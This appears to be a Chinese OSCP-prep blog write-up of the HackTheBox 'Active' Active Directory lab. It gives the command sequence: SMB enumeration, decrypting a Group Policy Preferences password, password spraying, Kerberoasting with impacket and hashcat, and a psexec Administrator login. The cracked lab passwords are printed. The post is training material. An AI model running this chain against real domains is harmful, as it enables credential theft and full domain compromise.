OSCP备考_0x53_HackThBox靶机_Windows_Active(AD域)

Ethan医生5个月前 (07-14)靶场227

nmap -sCV -p- --min-rate 10000 -T4 -sS 10.129.237.97 (扫描TCP)

enum4linux（自动化枚举）

enum4linux -a 10.129.237.97

smbclient //10.129.237.97/Replication

\active.htb\Policies{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Preferences\Groups> , 在Policies底下GPP

使用gpp-decrypt进行解密发现的哈希

GPPstillStandingStrong2k18

先使用这个用户密码喷各种服务先

crackmapexec smb 10.129.237.97 -u SVC_TGS -p pass.txt

首先就发现了smb有东西，登录用户

我们将看到我们在端口88上运行了kerberos，我们现在拥有一个用户，所以我们将去kerberoasting

如果你不知道什么是kerberoasting技术，你可以阅读这3篇文章

impacket-GetUserSPNs -request -dc-ip 10.129.237.97 active.htb/SVC_TGS

hashcat -m 13100 SVC.hash /usr/share/wordlists/rockyou.txt

爆破出来密码了Ticketmaster1968

远程登陆店铺登录不了，然后就用admin进行smb枚举

python3 /usr/share/doc/python3-impacket/examples/psexec.py active.htb/Administrator:Ticketmaster1968@10.129.237.97

标签: OSCP

返回列表

nmap -sCV -p- --min-rate 10000 -T4 -sS 10.129.180.205 (扫描TCP)nmap -sU --top-ports 100 ...

nmap -sCV -p- --min-rate 10000 -T4 -sS 10.129.7.227 (扫描TCP)nmap -sU --top-ports 100 10.129.7.22...

nmap -sCV -p- --min-rate 10000 -T4 -sS 10.129.244.125 (扫描TCP)135/tcp (MSRPC): Microsoft远程过...

名称说明靶机下载链接https://www.vulnhub.com/entry/tr0ll-1,100/攻击机（kali）ip：192.168.233.168靶机（CentOS）ip：192.168....

信息收集nmap -sCV -p- --min-rate 10000 -T4 -sS 10.129.204.217 (扫描TCP)nmap -sU --top-ports 100 10.12...

nmap -sCV -p- --min-rate 10000 -T4 -sS 10.129.62.153 (扫描TCP)nmap -sU --top-ports 100 10.129.62....

EthanDoctor